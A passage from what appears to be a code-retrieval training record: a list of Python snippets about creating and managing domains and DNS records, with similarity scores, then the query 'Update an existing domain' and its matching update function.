= ''.join(generate_string(10, valid_domain_name_chars))\n domain = random.choice(['com', 'co.il', 'info'])\n return domainname+'.'+domain", "def save(\n server_context: ServerContext,\n schema_name: str,\n query_name: str,\n domain: Domain,\n container_path: str = None,\n options: Dict = None,\n) -> any:\n url = server_context.build_url(\"property\", \"saveDomain.api\", container_path=container_path)\n payload = {\n \"domainDesign\": domain.to_json(),\n \"queryName\": query_name,\n \"schemaName\": schema_name,\n }\n\n if options is not None:\n payload[\"options\"] = options\n\n return server_context.make_request(url, json=payload)", "def test_dos_create_service_domain_list(self):\n # create a huge list of domain\n self.reset_defaults()\n for k in range(1, 30000):\n self.domain_list.append({\"domain\": \"w.t%s.com\" % k})\n\n # send MAX_ATTEMPTS requests\n for k in range(1, self.MAX_ATTEMPTS):\n self.service_name = str(uuid.uuid1())\n self.check_one_request()", "def create():", "def create():", "def generate_domain(domain):\n\n if domain.lower() in (\"greenland\", \"gris\", \"gris_ext\"):\n pism_exec = \"pismr\"\n elif domain.lower() in (\"og\"):\n pism_exec = \"pismr -no_model_strip 0 -calving_wrap_around\"\n elif domain.lower() in (\"hia\"):\n x_min = -652200.0\n x_max = -232600.0\n y_min = -1263900.0\n y_max = -943500.0\n pism_exec = \"\"\"pismr -x_range {x_min},{x_max} -y_range {y_min},{y_max} -bootstrap\"\"\".format(\n x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max\n )\n elif domain.lower() in (\"jakobshavn\", \"jib\"):\n x_min = -280000.0\n x_max = 320000.0\n y_min = -2410000.0\n y_max = 
-2020000.0\n pism_exec = \"\"\"pismr -regional -x_range {x_min},{x_max} -y_range {y_min},{y_max} -bootstrap -regional.zero_gradient true -regional.no_model_strip 4.5\"\"\".format(\n x_min=x_min, x_max=x_max, y_min=y_min, y_max=y_max\n )\n else:\n print((\"Domain {} not recognized, exiting\".format(domain)))\n import sys\n\n sys.exit(0)\n\n return pism_exec", "def CreateProxyGroupDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"CreateProxyGroupDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.CreateProxyGroupDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def test_delete_email_domain(self):\n email_dom = 'delete.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertTrue(domain.delete(email_dom))", "def create_hosted_zone(self, domain_name, caller_ref=None, comment=''):\r\n if caller_ref is None:\r\n caller_ref = str(uuid.uuid4())\r\n params = {'name' : domain_name,\r\n 'caller_ref' : caller_ref,\r\n 'comment' : comment,\r\n 'xmlns' : self.XMLNameSpace}\r\n xml = HZXML % params\r\n uri = '/%s/hostedzone' % self.Version\r\n response = self.make_request('POST', uri,\r\n {'Content-Type' : 'text/xml'}, xml)\r\n body = response.read()\r\n boto.log.debug(body)\r\n if response.status == 201:\r\n e = boto.jsonresponse.Element(list_marker='NameServers',\r\n item_marker=('NameServer',))\r\n h = boto.jsonresponse.XmlHandler(e, None)\r\n h.parse(body)\r\n return e\r\n else:\r\n raise exception.DNSServerError(response.status,\r\n response.reason,\r\n body)", "def create_domain_name(self, name):\n return (\"%s.%s.%s\" % (name, \"net\", self.domain)).lower()", "def create_user_domain():\n for host in online_hosts:\n with settings(warn_only=True):\n\n result1 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgUserDomain -o cfgUserDomainName <Domain Name> -i 1\")\n if result1.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for UserDomainName failed \")\n\n result2 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgActiveDirectory -o cfgADDomainController1 <Domain Name>\")\n if result2.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for DomainController1 failed \")\n\n result3 = sudo(\"racadm -r \"+host+\" -u root -p \"+PASSWORD+\" config -g cfgActiveDirectory -o cfgADGlobalCatalog1 <Domain Name>\")\n if result3.failed:\n logging.error(\"Host: [ \"+host+\" ] : \" + \"Configuration for GlobalCatalog1 failed \")", "def GetCreateAdminDomain(identifier, namespace=None):\n return pynt.xmlns.GetCreateRDFObject(identifier=identifier, namespace=namespace, klass=AdminDomain)", "def set_domain_path(self):\n\n self.domain_path = os.path.join(self.docs_path, self.domain)\n if not os.path.exists(self.domain_path):\n os.makedirs(self.domain_path)", "def test_invalid_email_domain_input(self):\n email_dom = '*.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n self.assertRaises(error.InputError, domain.create, email_dom)", "def create(subdomain, subject_type_or_type_name, subject_name, author):\n return Subject(key_name='%s:%s' % (subdomain, subject_name),\n 
type=get_name(subject_type_or_type_name), author=author)", "def domain(self, domain):\n self._domain = domain", "def domain(self, domain):\n self._domain = domain", "def delete_domain(DomainName=None):\n pass", "def create(cls, subdomain, key, **kwargs):\n key_name = subdomain + ':' + key\n return cls(key_name=key_name, subdomain=subdomain, **kwargs)", "def create_dir(self, domain):\n domain_dir = self.get_domaindir(domain)\n if not os.path.exists(domain_dir):\n os.makedirs(domain_dir)\n\n for dir in DOMAIN_DIRS:\n dir_ = domain_dir + \"/\" + dir\n if not os.path.exists(dir_):\n os.makedirs(dir_)", "def Run(self, args):\n project = properties.VALUES.core.project.Get(required=True)\n zone = {}\n zone['dnsName'] = args.dns_name\n zone['name'] = args.zone\n zone['description'] = args.description\n\n really = console_io.PromptContinue('Creating %s in %s' % (zone, project))\n if not really:\n return\n\n dns = self.context['dns']\n request = dns.managedZones().create(project=project, body=zone)\n try:\n result = request.execute()\n return result\n except errors.HttpError as error:\n raise exceptions.HttpException(util.GetError(error))\n except errors.Error as error:\n raise exceptions.ToolException(error)", "def set_domain(domain):\n set_hosts(domain)\n click.echo(\n 'Host file was set: {} -> 127.0.0.1'.format(', '.join(domain))\n )", "def insert_domain_page(page,domain_id):\r\n db = connect()\r\n cursor = db.cursor()\r\n sql_string = \"INSERT INTO domain_pages(domain_id, page_url) VALUES(%s, %s)\"\r\n try:\r\n cursor.execute(sql_string, (int(domain_id[0]), page))\r\n db.commit()\r\n except:\r\n cursor.close()\r\n raise RuntimeError(\"An Exception happened with the Database, make sure you are connected\")\r\n cursor.close()\r\n db.close()", "def test_create(self):\n xml = \"\"\"<domain></domain>\"\"\"\n expected = \"\"\"<domain><name>foo</name><uuid>foo</uuid><devices /></domain>\"\"\"\n hypervisor = mock.Mock()\n hypervisor.listNetworks.return_value = []\n with mock.patch('see.context.resources.lxc.open', mock.mock_open(read_data=xml), create=True):\n lxc.domain_create(hypervisor, 'foo', {'configuration': '/foo'})\n results = hypervisor.defineXML.call_args_list[0][0][0]\n self.assertEqual(results, expected, compare(results, expected))", "def testDomainMappingCreateVerifiedDomain(self):\n\n with mock.patch(\n 'googlecloudsdk.api_lib.run.global_methods.GetServerlessClientInstance',\n return_value=self.mock_serverless_client):\n verified_domains = [\n self.mock_serverless_client.MESSAGES_MODULE.AuthorizedDomain(\n id='www.example.com')\n ]\n with mock.patch(\n 'googlecloudsdk.api_lib.run.global_methods.ListVerifiedDomains',\n return_value=verified_domains):\n self.Run('run domain-mappings create '\n '--service myapp --domain www.example.com')\n\n self.operations.CreateDomainMapping.assert_called_once_with(\n self.domain_ref, 'myapp', [self.launch_stage_changes], False)\n self.AssertOutputContains(\n \"\"\"NAME RECORD TYPE CONTENTS\n myapp A 216.239.32.21\"\"\",\n normalize_space=True)", "def create():\n pass", "def add_subdomain(self, subdomain):\n\n return self.subdomain(self.domainname, subdomain).create()", "def __init__(__self__, *,\n domain_name: str,\n type: str):\n pulumi.set(__self__, \"domain_name\", domain_name)\n pulumi.set(__self__, \"type\", type)", "def addSubdomain(self, name):\n reply = self.rpc.addSubdomain(self.username,\n self.password,\n self.domain,\n name)\n if reply != \"OK\":\n raise Exception(\"RPC returned error: \" + reply)", "def m_create_identity(DID, domain_name, 
website, commercial_name, parent_node_account, password, overwrite):\n\n error, didDoc = create_identity(\n DID, domain_name, website, commercial_name, parent_node_account, password, overwrite)\n if error is not None:\n print(error)\n\n print(f\"Created\")", "def create(site):\n\n # Make sure the site name is all lowercased,\n # with no spaces. Yesod requires that.\n if not Utilities.is_word(site):\n Utilities.log(\"Site names must contain letters and numbers only,\")\n Utilities.log(\"with no spaces, dashes, or underscores.\")\n Utilities.log(\"Please choose a valid site name.\")\n exit(1)\n\n # Create the site.\n Yesod.create(site)", "def domain(self, domain):\n\n self._domain = domain", "def domain(self, domain):\n\n self._domain = domain", "def setup_domain_for_droplet(self, droplet, name):\n domain = self.manager.get_domain(self.domain)\n domain.load()\n droplet.load()\n domain.create_new_domain_record(type=\"A\", name=\"%s.net\" % name,\n data=droplet.ip_address)", "def AddActiveDirectoryDomain(parser):\n help_text = (\n 'Managed Service for Microsoft Active Directory domain this instance is '\n 'joined to. Only available for SQL Server instances.'\n )\n parser.add_argument('--active-directory-domain', help=help_text)", "def _create_project(self):\n request = {\n \"project\": {\n \"description\": \"description\",\n \"enabled\": True,\n \"name\": uuid.uuid4().hex,\n \"domain_id\": \"default\",\n }\n }\n response = self.client.post(PROJECT_PATH, data=json.dumps(request),\n headers=HEADERS)\n\n if response.status_code == 201:\n return response.json()\n else:\n raise SystemExit(\"Failed to create project.\")", "def fastlydomain(args):\n pprint(api.domain(service_id, args[0], args[1]).attrs)", "def _update_domains_on_server_create(self, server):\n ns_rec_content = self._sanitize_content(\"NS\", server['name'])\n\n LOG.debug(\"Content field of newly created NS records for \"\n \"existing domains upon server create is: %s\"\n % ns_rec_content)\n\n query_select = select([\n models.Domain.__table__.c.id,\n \"'%s'\" % self._sanitize_uuid_str(server['id']),\n models.Domain.__table__.c.name,\n \"'NS'\",\n \"'%s'\" % ns_rec_content,\n 1,\n 1]\n )\n\n columns = [\n models.Record.__table__.c.domain_id,\n models.Record.__table__.c.designate_id,\n models.Record.__table__.c.name,\n models.Record.__table__.c.type,\n models.Record.__table__.c.content,\n models.Record.__table__.c.auth,\n models.Record.__table__.c.inherit_ttl,\n ]\n\n query = InsertFromSelect(models.Record.__table__, query_select,\n columns)\n\n # Execute the manually prepared query\n # A TX is required for, at the least, SQLite.\n try:\n self.session.begin()\n self.session.execute(query)\n except Exception:\n with excutils.save_and_reraise_exception():\n self.session.rollback()\n else:\n self.session.commit()", "def add(self, domain, header, record_type, data, ttl=300, priority=5):\n return request(\n API_LIST.DNS_ADD.value,\n {\n 'email': self.email,\n 'token': self.token,\n 'domain': domain,\n 'header': header,\n 'type': record_type,\n 'data': data,\n 'ttl': ttl,\n 'priority': priority\n }\n )", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n\n id = \"id-%s\" % (domain)\n\n if id in self._zones:\n raise ZoneAlreadyExistsError(zone_id=id, value=None, driver=self)\n\n zone = Zone(id=id, domain=domain, type=type, ttl=ttl, extra={}, driver=self)\n self._zones[id] = {\"zone\": zone, \"records\": {}}\n return zone", "async def test_domain(self, dm):\n request = create_request(\"domain\", \"other\")\n result = await 
dm.apply_handler(request, create_responder(request))\n assert result.dialogue_state == \"domain\"", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y,start,stop,step,area_id = 0): \n \n self.number_of_subdomains += 1\n self.subdomains.number_of_subdomains = self.number_of_subdomains #set the 'number_of_subdomains' attribute \n name = 'subdomain' + str(self.number_of_subdomains) \n self.subdomainGroups.append(self.subdomains.createGroup(name) ) #great a new subdomain Group\n \n self.subdomainGroups[self.number_of_subdomains-1].filename = filename #set the bounds attributes for the subdomain\n\n self.subdomainGroups[self.number_of_subdomains-1].ll_x = ll_x #set the bounds attributes for the subdomain\n self.subdomainGroups[self.number_of_subdomains-1].ll_y = ll_y\n self.subdomainGroups[self.number_of_subdomains-1].ur_x = ur_x\n self.subdomainGroups[self.number_of_subdomains-1].ur_y = ur_y\n self.subdomainGroups[self.number_of_subdomains-1].start = start\n self.subdomainGroups[self.number_of_subdomains-1].stop = stop\n self.subdomainGroups[self.number_of_subdomains-1].step = step\n self.subdomainGroups[self.number_of_subdomains-1].area_id = area_id", "async def setjradd(self, ctx, domain):\n allowedDomains = await self.config.guild(ctx.guild).allowedDomains()\n allowedDomains.append(domain)\n await self.config.guild(ctx.guild).allowedDomains.set(allowedDomains)\n await ctx.message.add_reaction(\"✅\")", "def _perform(self, domain, validation_name, validation):\n\n domain_name = self._metaname_domain_name_for_hostname(validation_name)\n try:\n response = self._metaname_client().request(\n \"create_dns_record\",\n domain_name,\n self._txt_record(f\"{validation_name}.\", validation),\n )\n except Exception as e:\n raise errors.PluginError(\n f\"Unable to create an acme-challenge record in the zone {domain}: {e}\"\n ) from e\n else:\n self.created_record_reference = response", "def test_domain(self):\n self.assertEqual(self.gmail_case.domain, 'google.com')\n self.gmail_case.domain = 'yahoo.com'\n self.assertEqual(self.gmail_case.domain, 'yahoo.com')\n self.assertEqual(self.sld_case.domain, 'amazon.co.uk')\n self.assertEqual(self.gmail_case.tld, 'com')\n self.assertEqual(self.sld_case.tld, 'co.uk')\n self.gmail_case.tld = 'co.ke'\n self.sld_case.tld = 'gov'\n self.assertEqual(self.gmail_case.tld, 'co.ke')\n self.assertEqual(self.sld_case.tld, 'gov')\n self.assertEqual(self.gmail_case.domain, 'yahoo.co.ke')\n self.assertEqual(self.sld_case.domain, 'amazon.gov')", "def test_domain_ctnr(self):\n self.c1.domains.add(Domain.objects.get(name='oregonstate.edu'))\n\n c2 = Ctnr.objects.create(name='test_ctnr2')\n c2.ranges.add(self.r)\n\n self.create_ptr(\n ip_str='128.193.0.2', fqdn='foo1.oregonstate.edu',\n ip_type='4', ctnr=self.c1)\n self.create_ptr(\n ip_str='128.193.0.3', fqdn='foo2.oregonstate.edu',\n ip_type='4', ctnr=c2)", "def save_domain(self):\n del_domain = 0\n save_domain = 0\n\n sending_btn = self.dlg.sender().objectName()\n if sending_btn[:-1] == \"uBtnRemoveDomain\":\n del_domain = sending_btn[-1]\n if sending_btn[:-1] == \"uBtnSaveDomain\":\n save_domain = sending_btn[-1]\n\n keys = {}\n for entry in range(1, len(self.domains) + 2):\n if int(del_domain) == entry:\n continue\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(entry)).text()\n key = getattr(self.dlg, \"uTextAPIKey{0}\".format(entry)).text().strip()\n if domain and key:\n keys[domain] = key\n self.api_key_instance.set_api_keys(keys)\n\n # remove store capability docs for the removed or add domain/key\n # if 
they already exits .i.e these will be reloaded\n if save_domain:\n ui_elem_num = save_domain\n else:\n ui_elem_num = del_domain\n\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(ui_elem_num)).text()\n self.local_store.del_domains_xml(domain)\n\n # load / Reload service data\n self.load_settings()\n self.dlg.uWarningSettings.hide()\n self.dlg.uLabelWarning.hide()\n if self.curr_list_wid_index is not None:\n self.dlg.uListOptions.setCurrentItem(self.curr_list_wid_index)\n else:\n self.dlg.uListOptions.setCurrentRow(0)\n\n self.dlg.uStackedWidget.setCurrentIndex(0)\n self.services_loaded = False # key change, load data again\n self.load_ui()", "def domain(self, value):\n if hasattr(self, \"_domain\"):\n raise ValueError(\"A ServerName's domain cannot be changed.\")\n if value is None:\n raise ValueError(\"A ServerName must be given a domain.\")\n if not isinstance(value, str):\n raise TypeError(\"The domain must be a string, not %s.\" % (type(value)))\n if value is \"\":\n raise ValueError(\"A empty string is not a valid domain.\")\n self._domain = value", "def company():\n\n company = Company.objects.create(name='Tre G.M.B.H.', country='Germany')\n return company", "def create(self):\n\t\treturn handle_to_object(call_sdk_function('PrlSrv_Create'))", "def domain(self, domain=None):\n\n return self.domain_class(apiobj=self, domainname=domain)" ]
[ "0.85276437", "0.7999616", "0.7635129", "0.7572509", "0.745609", "0.7389668", "0.73356265", "0.7306637", "0.72217894", "0.72094274", "0.71779686", "0.71715486", "0.7072683", "0.70593244", "0.7049416", "0.7021447", "0.70118153", "0.6965163", "0.6953879", "0.68060184", "0.67575157", "0.67476666", "0.67468023", "0.6722885", "0.6698058", "0.6688507", "0.66364205", "0.6568596", "0.6449279", "0.6405425", "0.6376646", "0.63315713", "0.6312915", "0.62846965", "0.61674", "0.6166814", "0.6166336", "0.61001366", "0.6097927", "0.60204047", "0.60056305", "0.5947531", "0.5947079", "0.594154", "0.59373116", "0.58956856", "0.58902884", "0.58902884", "0.5887031", "0.5841805", "0.5831175", "0.5776316", "0.5776316", "0.5769221", "0.5767488", "0.57672507", "0.5762473", "0.57524043", "0.5715049", "0.56886864", "0.56805927", "0.5673255", "0.5667465", "0.56514907", "0.5650661", "0.5650661", "0.5635848", "0.5630922", "0.56305766", "0.56246585", "0.5621423", "0.5613649", "0.5600299", "0.5577198", "0.5559958", "0.5542713", "0.55354655", "0.5527555", "0.5504028", "0.5492911", "0.5483442", "0.5483442", "0.54790556", "0.54720384", "0.5471931", "0.54578704", "0.5448646", "0.5442973", "0.5436437", "0.54332775", "0.5432362", "0.5427165", "0.54200053", "0.54197365", "0.5418946", "0.54151136", "0.5414429", "0.53811395", "0.5359927", "0.5359237" ]
0.743728
5
Update an existing domain
def update(domain_id, name, sensitive): domain = get(domain_id) domain.name = name domain.sensitive = sensitive database.update(domain)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def edit_domain(domain_name):\n\n if request.method == \"POST\":\n domain = session.query(Domain).filter(\n Domain.domain_name == domain_name).first()\n\n # Check if domain.provider object exists to make sure\n # duplicate Provider.provider_url is not created\n provider = session.query(Provider).filter(\n Provider.provider_url == domain.provider.provider_url).first()\n if not provider:\n provider = Provider(\n provider_url=request.form[\"provider-url\"].strip())\n\n domain.category.category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"].strip()).first()\n\n domain.domain_name = parse_url(request.form[\"domain-name\"].strip())\n domain.ip = request.form[\"ip-address\"].strip()\n domain.provider.provider_url = parse_url(\n provider.provider_url.strip())\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Updated {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Problem with one of the fields.\".format(\n \"<strong>\", \"</strong>\")\n flash(message, \"danger\")\n return redirect(url_for(\"edit_domain\", domain_name=domain_name))\n\n if request.form[\"submit\"] == \"Save\":\n return redirect(url_for(\"view_domain\",\n domain_name=domain.domain_name,\n category_names=category_names))\n else:\n return redirect(url_for(\"edit_domain\",\n domain_name=domain.domain_name,\n category_names=category_names))\n else:\n domain = session.query(Domain).filter(\n Domain.domain_name == domain_name).first()\n\n # Obtain list of domain names without tuple to use\n # for domain_pager()\n domain_names = [d.domain_name for d in session.query(\n Domain.domain_name).order_by(Domain.domain_name).all()]\n next_domain, previous_domain = domain_pager(domain_name, domain_names)\n\n kwargs = {\n \"domain\": domain,\n \"domain_name\": domain_name,\n \"category_names\": category_names,\n \"next_domain\": next_domain,\n \"previous_domain\": previous_domain\n }\n return render_template(\"edit_domain.html\", **kwargs)", "def update_domain():\n\n for e in Expr.search() + User.search(): e.set_tld(config.server_name)", "def test_update_domain_only(self):\n self.test_update()", "def update_domain (cls, base, updated, log):\n # Get new domain name\n domain = cls.detect_domains(nffg=updated)\n if len(domain) == 0:\n log.error(\"No domain detected in new %s!\" % updated)\n return\n if len(domain) > 1:\n log.warning(\"Multiple domain name detected in new %s!\" % updated)\n return\n domain = domain.pop()\n log.debug(\"Update elements of domain: %s in %s...\" % (domain, base.id))\n base_infras = {i.id for i in base.infras if i.domain == domain}\n if len(base_infras) == 0:\n log.warning(\"No Node was found in the base %s! 
Use merging...\" % base)\n return cls.merge_new_domain(base=base, nffg=updated, log=log)\n # If infra nodes were removed or added, best way is to remerge domain\n else:\n # TODO - implement real update\n log.error(\"Domain update has not implemented yet!\")", "def set_domain(self, domain):\n\n self._domain = domain\n\n self.changed = True", "def post_domain_update(self, resource_id, resource_dict):\n pass", "def change_the_Domain_for_ad_domain_and_click_Save(driver, ad_domain):\n global domain\n domain = ad_domain\n assert wait_on_element(driver, 5, '//input[@ix-auto=\"input__Domain\"]')\n # driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain\"]').clear()\n # driver.find_element_by_xpath('//input[@ix-auto=\"input__Domain\"]').send_keys(ad_domain)\n assert wait_on_element(driver, 7, '//button[@ix-auto=\"button__SAVE\"]', 'clickable')\n driver.find_element_by_xpath('//button[@ix-auto=\"button__SAVE\"]').click()", "def ModifyDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"ModifyDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.ModifyDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def domain_update(self, domain, contact_info, raw=True, **kwargs):\n endpoint = '/Domain/Update'\n\n params = {\n 'Domain' : domain\n }\n\n params.update(contact_info)\n params.update(kwargs)\n\n response = self.__perform_get_request(endpoint, params)\n\n if response.status_code == 200:\n parsed_response = response.json()\n if raw:\n return parsed_response\n else:\n return parsed_response['product'][0]['status'] == 'SUCCESS'", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def replace_domain(address, old_domain, new_domain):\n old_domain_pattern = r'' + old_domain + '$'\n address = re.sub(old_domain_pattern, new_domain, address)\n return address", "def update(request):\n from pprint import pformat\n if 'ipv4' not in request.GET and 'ipv6' not in request.GET:\n return HttpResponse(\"Must specify one or both of ipv4/ipv6 address\\nParams:%s\" % pformat(request.GET.dict()), status=400)\n if not u'domain' in request.GET:\n return HttpResponse(\"Must specify domain\\nParams:%s\" % pformat(request.GET.dict()), status=400)\n\n for ipvx, record_type in ((u'ipv4', 'A'), (u'ipv6', 'AAAA')):\n if ipvx not in request.GET:\n continue\n record, created = Record.objects.get_or_create(\n name=request.GET['domain'],\n type=record_type,\n )\n record.domain_id = 1\n record.ttl = 1\n record.auth = True\n record.content = request.GET[ipvx]\n record.save()\n\n return HttpResponse(\"Saved record(s)\")", "def set_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains/\" + \\\n str(kwargs['domain_id'])\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", \"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"PATCH\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from 
Server while set the domain\")\n print (\"No response from Server while set the domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n return True", "def _adddomain(self, domain: Domain):\n\n domain = copy.deepcopy(domain)\n if self.model is not None:\n # Check that model and domain are compatible\n self._validate_model_domain(self.model, domain)\n\n # Add in domain\n self.domain = domain\n\n # Setup base namelists\n self._set_base_namelists()\n else:\n self.domain = domain", "def change_domain(self, new_domain):\n self.domain=new_domain\n for pm in self._maps.values():\n pm.change_domain(new_domain)", "def update_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:\n pass", "def domain(self, domain):\n self._domain = domain", "def domain(self, domain):\n self._domain = domain", "def save_domain(self):\n del_domain = 0\n save_domain = 0\n\n sending_btn = self.dlg.sender().objectName()\n if sending_btn[:-1] == \"uBtnRemoveDomain\":\n del_domain = sending_btn[-1]\n if sending_btn[:-1] == \"uBtnSaveDomain\":\n save_domain = sending_btn[-1]\n\n keys = {}\n for entry in range(1, len(self.domains) + 2):\n if int(del_domain) == entry:\n continue\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(entry)).text()\n key = getattr(self.dlg, \"uTextAPIKey{0}\".format(entry)).text().strip()\n if domain and key:\n keys[domain] = key\n self.api_key_instance.set_api_keys(keys)\n\n # remove store capability docs for the removed or add domain/key\n # if they already exits .i.e these will be reloaded\n if save_domain:\n ui_elem_num = save_domain\n else:\n ui_elem_num = del_domain\n\n domain = getattr(self.dlg, \"uTextDomain{0}\".format(ui_elem_num)).text()\n self.local_store.del_domains_xml(domain)\n\n # load / Reload service data\n self.load_settings()\n self.dlg.uWarningSettings.hide()\n self.dlg.uLabelWarning.hide()\n if self.curr_list_wid_index is not None:\n self.dlg.uListOptions.setCurrentItem(self.curr_list_wid_index)\n else:\n self.dlg.uListOptions.setCurrentRow(0)\n\n self.dlg.uStackedWidget.setCurrentIndex(0)\n self.services_loaded = False # key change, load data again\n self.load_ui()", "def domain(self, domain):", "def domain(self, domain):\n\n self._domain = domain", "def domain(self, domain):\n\n self._domain = domain", "def add(self, newaddress):\n list = newaddress.split(\"@\")\n newdomain = list[-1]\n if not newdomain in self.__domainlist:\n self.__domainlist.append(newdomain)\n else:\n print(\"Domain is already in the database\")", "def add_new_domain(self):\n\n domain = self.dlg.uComboBoxDomain.currentText()\n\n if domain in self.domains:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: Domains must be unique. \" \"Please edit the domain below\"\n )\n return\n\n if len(self.domains) >= 10:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: You can only store up to . 
\" \"10 domain entries\"\n )\n return\n\n if domain == \"OTHER\":\n domain = \"\"\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).setText(\n domain\n )\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uTextAPIKey{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnRemoveDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnSaveDomain{0}\".format(len(self.domains) + 1)).show()\n self.dlg.uWarningSettings.hide()", "def update(domain_name=None, primary_ns=None, admin_mail=None, refresh=None,\n retry=None, expire=None, default_ttl=None, patch=False, **kwargs):\n url = 'https://api.cloudns.net/dns/modify-soa.json'\n\n params = Parameters({\n 'domain-name': domain_name,\n 'primary-ns': primary_ns,\n 'admin-mail': admin_mail,\n 'refresh': {\n 'value': refresh,\n 'min_value': 1200,\n 'max_value': 43200,\n },\n 'retry': {\n 'value': retry,\n 'min_value': 180,\n 'max_value': 2419200,\n },\n 'expire': {\n 'value': expire,\n 'min_value': 1209600,\n 'max_value': 2419200,\n },\n 'default-ttl': {\n 'value': default_ttl,\n 'min_value': 60,\n 'max_value': 2419200,\n },\n })\n\n return requests.post(url, params=params.to_dict())", "def update_type_A_domain(self, domain, point_to):\n r53 = self.connections.get_route53()\n\n # Get Zone ID\n zone = r53.get_zone(self.env.domain)\n zone_id = zone.id\n\n if not zone.get_a(domain):\n sys.exit(\"\\nAbort: {} does not exists! \" \\\n \"Please create first!\".format(domain))\n\n # Commit change\n try:\n changes = ResourceRecordSets(connection=r53, hosted_zone_id=zone_id)\n change = changes.add_change(action='UPSERT', name=domain, type=\"A\")\n change.set_alias(\n alias_hosted_zone_id=zone_id,\n alias_dns_name=point_to,\n alias_evaluate_target_health=False)\n changes.commit()\n except DNSServerError:\n raise\n except Exception:\n print(\"Unexpected error: {}\".format(traceback.format_exc()))\n sys.exit(1)\n\n # Print record set\n record = zone.get_a(domain)\n print(\"\\nUpdated record set is:\\n{}\".format(record.to_print()))", "def update_instance_url(setting):\n site_obj = Site.objects.all().order_by('id').first()\n site_obj.domain = setting.value\n site_obj.save()", "def set_domain(domain):\n set_hosts(domain)\n click.echo(\n 'Host file was set: {} -> 127.0.0.1'.format(', '.join(domain))\n )", "def update_domain_endpoint_options(DomainName=None, DomainEndpointOptions=None):\n pass", "def test_update_domain_with_a_record(self):\n a_record = [{'type': 'A',\n 'name': 'ftp.example.com',\n 'data': '192.0.2.8',\n 'ttl': 3600}]\n self.test_update(updateRecords=a_record)", "def test_domain_changes_new_sitename_empty_domain_different(self):\n from django.contrib.sites.models import Site\n\n site_1 = Site.objects.create(name='Site 1', domain='site1.com')\n site_2 = Site.objects.create(name='Site 2', domain='site2.com')\n\n with self.settings(ALDRYN_SITES_DOMAINS={\n site_1.pk: {'name': '', 'domain': 'other-site1.com'},\n site_2.pk: {'name': None, 'domain': 'other-site2.com'},\n }):\n utils.set_site_names(force=True)\n\n s = Site.objects.get(id=site_1.pk)\n self.assertEquals(s.name, 'Site 1')\n self.assertEquals(s.domain, 'other-site1.com')\n\n s = Site.objects.get(id=site_2.pk)\n self.assertEquals(s.name, 'Site 2')\n self.assertEquals(s.domain, 'other-site2.com')", "def add_domain():\n\n today = date.today()\n\n if request.method == \"POST\":\n # Check to see if domain already exists because\n # duplicate domain names aren't allowed\n domain = 
